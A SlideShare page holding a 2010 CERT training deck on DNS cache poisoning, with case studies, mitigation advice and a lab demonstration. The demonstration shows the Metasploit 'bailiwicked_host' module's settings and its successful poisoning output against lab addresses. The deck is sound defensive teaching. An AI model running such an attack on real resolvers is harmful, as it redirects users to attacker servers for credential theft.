SlideShare a Scribd company logo

Day 2 Dns Cert 4a Cache Poisoning

V
vngundi

- The document describes a demonstration of a DNS cache poisoning attack. It provides instructions for setting up the attack using tools on a Ubuntu VM. The attack spoofs DNS responses to redirect traffic from a domain to a malicious IP address controlled by the attacker. This could enable realistic phishing attacks. Mitigation strategies include DNSSEC, SSL, and monitoring recursive DNS servers, but user awareness remains important.

Technology
1 of 18
Downloaded 39 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
DNS Security for CERTs - Attack Scenarios & Demonstrations – Cache Poisoning Chris Evans Delta Risk, LLC 7 March 2010 1
What You Will Need for the Exercise • Your Ubuntu VM – VMWare Web Console Access – SSH with X11 Forwarding (for Advanced Users) • Do a query for www.tld1 and verify its IP address before the attack is launched: – 192.168.101.50 2
Description • A Change in Recursive DNS Server Causes Spoofed or Incorrect Resolutions – Attack Doesn’t Target Registry Architecture DNS Google.com ISP 1 DNS Fake Google ISP 2 Resolves Differently Than 3
Description • Cache poisoning attacks target a specific DNS server, and therefore, only the users which use that DNS server – This doesn’t fit the “get most bang for the buck” of typical hackers out for fame and glory – BUT, the attack can be very insidious, difficult to detect and completely transparent to the victim • These attacks occur infrequently, or, are just not being detected and reported. 4
Case Study – External Poisoning • Unverified report of a Brazilian bank victimized by cache poisoning attack. • Attack targeted local ISP DNS server • ISP reported only “1%” of its users were affected Eweek.com 4/22/09 5
Case Study – External Poisoning • Hackers poisoned local ISP DNS server and redirected users to a login page that looked just like the Bank’s login page • Solicited usernames, passwords, and other information not normally asked for by the Bank at login Actual Bradesco Login Page 6
Case Study – Internal Poisoning • Partido Colorado – political statement made by one organization against another during an election Attacker Modifies Upstream DNS Records www.partidocolorado.org. 3600 IN A 66.249.01.121 7
Case Study – Internal Poisoning • The local ISP (Copaco) modified its own recursive name servers to redirect users looking for partidocolorado.org to a state-run news service 201.217.51.114 Attacker Modified Upstream DNS Records www.partidocolorado.org. 3600 IN A 66.249.01.121 8
Attack Demonstration External Poisoning DNS Cache Web Server DNS Server Hacker Normal Request Poisoned Request Victim Web Server 9
Demonstration – Attacker View _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | / _ ) _)/ _ |/___) _ | |/ _ | | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|____)___)_||_(___/| ||_/|_|___/|_|___) |_| =[ msf v3.2-release + -- --=[ 320 exploits - 217 payloads + -- --=[ 20 encoders - 6 nops =[ 99 aux msf auxiliary(bailiwicked_host) > Name: DNS BailiWicked Host Attack Version: 5794 Provided by: I)ruid <druid@caughq.org> hdm <hdm@metasploit.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- HOSTNAME www.tld1 yes Hostname to hijack NEWADDR 192.168.85.5 yes New address for hostname RECONS 192.168.101.10 yes The nameserver used for recon RHOST 192.168.80.10 yes The target address SRCADDR Real yes The source address to use for SRCPORT 53 yes The target server's source TTL 37620 yes The TTL for the malicious host XIDS 0 yes The number of XIDs to try for 10
Demonstration – Attacker View (cont.) [*] Targeting nameserver 192.168.80.10 for injection of www.tld1. as 192.168.85.5 [*] Querying recon nameserver for tld1.'s nameservers... [*] Got an NS record: tld1. 180 IN NS ns1.tld1. [*] Querying recon nameserver for address of ns1.tld1.... [*] Got an A record: ns1.tld1. 180 IN A 192.168.101.10 [*] Checking Authoritativeness: Querying 192.168.101.10 for tld1.... [*] ns1.tld1. is authoritative for tld1., adding to list of nameservers to spoof as [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.0/0.06/0.0 | min/max/avg replies: 0/6/3 [*] Sending 4 spoofed replies from each nameserver (1) for each query [*] Attempting to inject a poison record for www.tld1. into 192.168.80.10:53... ... ... ... ... [*] Poisoning successful after 61000 queries and 250000 responses: www.tld1 == 192.168.85.5 [*] TTL: 37619 DATA: #<Resolv::DNS::Resource::IN::A:0xb6b28688> [*] Auxiliary module execution completed Attack Successful!!!!! 11
Demonstration – Server View • Wireshark Capture – Note the queries like “031PtyJamG6o.tld1” 12
Demonstration – User View • Please open a browser and connect to the webmail server: http://192.168.101.50/squirrelmail – Login as: studentX – Password: password • Examine the message in your inbox – Looks realistic? ( Use your imagination  ) – The URL certainly does – it matches the web registry system URL. • Click on the link (it won’t hurt you!) – Does this look like the login page of the web registry system? 13
Demonstration – User View 1 3 2 May look legit but is the hacker’s IP and webserver!!!!! 14
Impact • Users are dependent on the answers from the DNS being accurate and legitimate • Cache Poisoning can be used to create very realistic phishing attacks, that are more likely to succeed, because they appear to use real URLs. – Users are more attune to “strange” URLs now than several years ago, but cache poisoning allows an attacker to use a “normal” URL 15
Mitigation & Response Strategies • DNSSEC – will mitigate effect of external poisoning attacks, but will not address content “issues” at the authoritative server • SSL-Based Logins – but subject to user participation! • Server validation techniques like “site keys” – but again, subject to user participation! • Proactive monitoring of recursive servers – not necessarily tractable – but maybe useful for High Value Domains 16
Mitigation & Response Strategies • Know WHO to contact at the ISPs within your span of control • Know the procedures for flushing the DNS cache – you may have to instruct operators how to do this! • Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim 17
Questions? ? 18

More Related Content

PPTX
Grey H@t - DNS Cache Poisoning
Christopher Grayson
 
PDF
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
Luke Young
 
PDF
Namespaces for Local Networks
Men and Mice
 
PDF
DNS/DNSSEC by Nurul Islam
MyNOG
 
PDF
Part 2 - Local Name Resolution in Windows Networks
Men and Mice
 
PDF
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Men and Mice
 
PDF
Windows 2012 and DNSSEC
Men and Mice
 
PDF
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
APNIC
 
Grey H@t - DNS Cache Poisoning
Christopher Grayson
 
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
Luke Young
 
Namespaces for Local Networks
Men and Mice
 
DNS/DNSSEC by Nurul Islam
MyNOG
 
Part 2 - Local Name Resolution in Windows Networks
Men and Mice
 
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Men and Mice
 
Windows 2012 and DNSSEC
Men and Mice
 
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
APNIC
 

What's hot (20)

PDF
Understanding and Deploying DNSSEC, by Champika Wijayatunga [APRICOT 2015]
APNIC
 
ODT
RHCE FINAL Questions and Answers
Radien software
 
PDF
[India Merge World Tour] Meru Networks
Perforce
 
PPTX
HKNOG 5.0 - NSEC caching
APNIC
 
PDF
Troubleshooting Tips from a Docker Support Engineer
Jeff Anderson
 
PDF
Yeti DNS - Experimenting at the root
Men and Mice
 
PPTX
Cloudstone - Sharpening Your Weapons Through Big Data
Christopher Grayson
 
PDF
2016 JavaOne Deconstructing REST Security
David Blevins
 
PDF
How to send DNS over anything encrypted
Men and Mice
 
PDF
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 
PDF
2017 dev nexus_deconstructing_rest_security
David Blevins
 
PDF
Keeping DNS server up-and-running with “runit
Men and Mice
 
PDF
Windows Server 2016 Webinar
Men and Mice
 
PDF
Mens jan piet_dnssec-in-practice
kuchinskaya
 
PDF
Database Hardware Benchmarking
Command Prompt., Inc
 
PPTX
Putting Wings on the Elephant
DataWorks Summit
 
PPTX
Collaborate instant cloning_kyle
Kyle Hailey
 
KEY
Apache Wizardry - Ohio Linux 2011
Rich Bowen
 
PDF
End-to-End Analysis of a Domain Generating Algorithm Malware Family
CrowdStrike
 
PDF
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
OpenDNS
 
Understanding and Deploying DNSSEC, by Champika Wijayatunga [APRICOT 2015]
APNIC
 
RHCE FINAL Questions and Answers
Radien software
 
[India Merge World Tour] Meru Networks
Perforce
 
HKNOG 5.0 - NSEC caching
APNIC
 
Troubleshooting Tips from a Docker Support Engineer
Jeff Anderson
 
Yeti DNS - Experimenting at the root
Men and Mice
 
Cloudstone - Sharpening Your Weapons Through Big Data
Christopher Grayson
 
2016 JavaOne Deconstructing REST Security
David Blevins
 
How to send DNS over anything encrypted
Men and Mice
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 
2017 dev nexus_deconstructing_rest_security
David Blevins
 
Keeping DNS server up-and-running with “runit
Men and Mice
 
Windows Server 2016 Webinar
Men and Mice
 
Mens jan piet_dnssec-in-practice
kuchinskaya
 
Database Hardware Benchmarking
Command Prompt., Inc
 
Putting Wings on the Elephant
DataWorks Summit
 
Collaborate instant cloning_kyle
Kyle Hailey
 
Apache Wizardry - Ohio Linux 2011
Rich Bowen
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
CrowdStrike
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
OpenDNS
 
Ad

Similar to Day 2 Dns Cert 4a Cache Poisoning (20)

PDF
Day 2 Dns Cert 4c Malicious Use
vngundi
 
PPTX
IT Infrastrucutre Security
S Periyakaruppan CISM,ISO31000,C-EH,ITILF
 
PDF
Dns Hardening Linux Os
ecarrow
 
PDF
Day 2 Dns Cert 4b Name Server Redirection
vngundi
 
PPTX
lecture5.pptxJHKGJFHDGTFGYIUOIUIPIOIPUOHIYGUYFGIH
Abodahab
 
PPTX
lecture5.pptx
Llobarro2
 
PDF
Hitbkl 2012
F _
 
PDF
SANS xmas 2011 Hacking Submission
Johnny Vestergaard
 
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Zack Meyers
 
PDF
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Chris Gates
 
PDF
DNS Attacks
Himanshu Prabhakar
 
PPT
Security & ethical hacking
Amanpreet Singh
 
PDF
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
ClubHack
 
PDF
Day 2 Dns Cert 4 Scenarios
vngundi
 
PDF
DNS Cache Poisoning
Kourosh Sajjadi
 
PDF
business
Gajendra Saini
 
PPT
Dns protocol design attacks and security
Michael Earls
 
PDF
Penetration Testing is the Art of the Manipulation
JongWon Kim
 
PPTX
Network And Application Layer Attacks
Arun Modi
 
PDF
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
FindWhitePapers
 
Day 2 Dns Cert 4c Malicious Use
vngundi
 
IT Infrastrucutre Security
S Periyakaruppan CISM,ISO31000,C-EH,ITILF
 
Dns Hardening Linux Os
ecarrow
 
Day 2 Dns Cert 4b Name Server Redirection
vngundi
 
lecture5.pptxJHKGJFHDGTFGYIUOIUIPIOIPUOHIYGUYFGIH
Abodahab
 
lecture5.pptx
Llobarro2
 
Hitbkl 2012
F _
 
SANS xmas 2011 Hacking Submission
Johnny Vestergaard
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Zack Meyers
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Chris Gates
 
DNS Attacks
Himanshu Prabhakar
 
Security & ethical hacking
Amanpreet Singh
 
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
ClubHack
 
Day 2 Dns Cert 4 Scenarios
vngundi
 
DNS Cache Poisoning
Kourosh Sajjadi
 
business
Gajendra Saini
 
Dns protocol design attacks and security
Michael Earls
 
Penetration Testing is the Art of the Manipulation
JongWon Kim
 
Network And Application Layer Attacks
Arun Modi
 
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
FindWhitePapers
 
Ad

More from vngundi (8)

PDF
Anatomy of a CERT - Gordon Love, Symantec
vngundi
 
PDF
Dealing With Security Threats
vngundi
 
PDF
Cyber Security Strategies and Approaches
vngundi
 
PDF
Day 2 Dns Cert 3 Dns Organizations
vngundi
 
PDF
Day 1 Large Scale Attacks
vngundi
 
PDF
Day 1 From CERT To NCSC
vngundi
 
PDF
Day 1 Enisa Setting Up A Csirt
vngundi
 
PDF
Day 1 Coop Banks
vngundi
 
Anatomy of a CERT - Gordon Love, Symantec
vngundi
 
Dealing With Security Threats
vngundi
 
Cyber Security Strategies and Approaches
vngundi
 
Day 2 Dns Cert 3 Dns Organizations
vngundi
 
Day 1 Large Scale Attacks
vngundi
 
Day 1 From CERT To NCSC
vngundi
 
Day 1 Enisa Setting Up A Csirt
vngundi
 
Day 1 Coop Banks
vngundi
 

Recently uploaded (20)

PDF
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
PDF
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PDF
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDCA Consulting
 
PDF
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
PDF
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
PDF
Approach and Philosophy of On baking technology
30anthuong17
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
PDF
project resource management chapter-09.pdf
ssuser00e6e21
 
PDF
A comparative study of natural language inference in Swahili using monolingua...
IAESIJAI
 
PDF
Mushroom cultivation and it's methods.pdf
mailmeonrishi
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PPTX
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
PPTX
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
PDF
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDCA Consulting
 
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
Approach and Philosophy of On baking technology
30anthuong17
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
Encapsulation theory and applications.pdf
gurumoop
 
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
project resource management chapter-09.pdf
ssuser00e6e21
 
A comparative study of natural language inference in Swahili using monolingua...
IAESIJAI
 
Mushroom cultivation and it's methods.pdf
mailmeonrishi
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 

Day 2 Dns Cert 4a Cache Poisoning

  • 1. DNS Security for CERTs - Attack Scenarios & Demonstrations – Cache Poisoning Chris Evans Delta Risk, LLC 7 March 2010 1
  • 2. What You Will Need for the Exercise • Your Ubuntu VM – VMWare Web Console Access – SSH with X11 Forwarding (for Advanced Users) • Do a query for www.tld1 and verify its IP address before the attack is launched: – 192.168.101.50 2
  • 3. Description • A Change in Recursive DNS Server Causes Spoofed or Incorrect Resolutions – Attack Doesn’t Target Registry Architecture DNS Google.com ISP 1 DNS Fake Google ISP 2 Resolves Differently Than 3
  • 4. Description • Cache poisoning attacks target a specific DNS server, and therefore, only the users which use that DNS server – This doesn’t fit the “get most bang for the buck” of typical hackers out for fame and glory – BUT, the attack can be very insidious, difficult to detect and completely transparent to the victim • These attacks occur infrequently, or, are just not being detected and reported. 4
  • 5. Case Study – External Poisoning • Unverified report of a Brazilian bank victimized by cache poisoning attack. • Attack targeted local ISP DNS server • ISP reported only “1%” of its users were affected Eweek.com 4/22/09 5
  • 6. Case Study – External Poisoning • Hackers poisoned local ISP DNS server and redirected users to a login page that looked just like the Bank’s login page • Solicited usernames, passwords, and other information not normally asked for by the Bank at login Actual Bradesco Login Page 6
  • 7. Case Study – Internal Poisoning • Partido Colorado – political statement made by one organization against another during an election Attacker Modifies Upstream DNS Records www.partidocolorado.org. 3600 IN A 66.249.01.121 7
  • 8. Case Study – Internal Poisoning • The local ISP (Copaco) modified its own recursive name servers to redirect users looking for partidocolorado.org to a state-run news service 201.217.51.114 Attacker Modified Upstream DNS Records www.partidocolorado.org. 3600 IN A 66.249.01.121 8
  • 9. Attack Demonstration External Poisoning DNS Cache Web Server DNS Server Hacker Normal Request Poisoned Request Victim Web Server 9
  • 10. Demonstration – Attacker View _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | / _ ) _)/ _ |/___) _ | |/ _ | | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|____)___)_||_(___/| ||_/|_|___/|_|___) |_| =[ msf v3.2-release + -- --=[ 320 exploits - 217 payloads + -- --=[ 20 encoders - 6 nops =[ 99 aux msf auxiliary(bailiwicked_host) > Name: DNS BailiWicked Host Attack Version: 5794 Provided by: I)ruid <druid@caughq.org> hdm <hdm@metasploit.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- HOSTNAME www.tld1 yes Hostname to hijack NEWADDR 192.168.85.5 yes New address for hostname RECONS 192.168.101.10 yes The nameserver used for recon RHOST 192.168.80.10 yes The target address SRCADDR Real yes The source address to use for SRCPORT 53 yes The target server's source TTL 37620 yes The TTL for the malicious host XIDS 0 yes The number of XIDs to try for 10
  • 11. Demonstration – Attacker View (cont.) [*] Targeting nameserver 192.168.80.10 for injection of www.tld1. as 192.168.85.5 [*] Querying recon nameserver for tld1.'s nameservers... [*] Got an NS record: tld1. 180 IN NS ns1.tld1. [*] Querying recon nameserver for address of ns1.tld1.... [*] Got an A record: ns1.tld1. 180 IN A 192.168.101.10 [*] Checking Authoritativeness: Querying 192.168.101.10 for tld1.... [*] ns1.tld1. is authoritative for tld1., adding to list of nameservers to spoof as [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.0/0.06/0.0 | min/max/avg replies: 0/6/3 [*] Sending 4 spoofed replies from each nameserver (1) for each query [*] Attempting to inject a poison record for www.tld1. into 192.168.80.10:53... ... ... ... ... [*] Poisoning successful after 61000 queries and 250000 responses: www.tld1 == 192.168.85.5 [*] TTL: 37619 DATA: #<Resolv::DNS::Resource::IN::A:0xb6b28688> [*] Auxiliary module execution completed Attack Successful!!!!! 11
  • 12. Demonstration – Server View • Wireshark Capture – Note the queries like “031PtyJamG6o.tld1” 12
  • 13. Demonstration – User View • Please open a browser and connect to the webmail server: http://192.168.101.50/squirrelmail – Login as: studentX – Password: password • Examine the message in your inbox – Looks realistic? ( Use your imagination  ) – The URL certainly does – it matches the web registry system URL. • Click on the link (it won’t hurt you!) – Does this look like the login page of the web registry system? 13
  • 14. Demonstration – User View 1 3 2 May look legit but is the hacker’s IP and webserver!!!!! 14
  • 15. Impact • Users are dependent on the answers from the DNS being accurate and legitimate • Cache Poisoning can be used to create very realistic phishing attacks, that are more likely to succeed, because they appear to use real URLs. – Users are more attune to “strange” URLs now than several years ago, but cache poisoning allows an attacker to use a “normal” URL 15
  • 16. Mitigation & Response Strategies • DNSSEC – will mitigate effect of external poisoning attacks, but will not address content “issues” at the authoritative server • SSL-Based Logins – but subject to user participation! • Server validation techniques like “site keys” – but again, subject to user participation! • Proactive monitoring of recursive servers – not necessarily tractable – but maybe useful for High Value Domains 16
  • 17. Mitigation & Response Strategies • Know WHO to contact at the ISPs within your span of control • Know the procedures for flushing the DNS cache – you may have to instruct operators how to do this! • Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim 17
  • 18. Questions? ? 18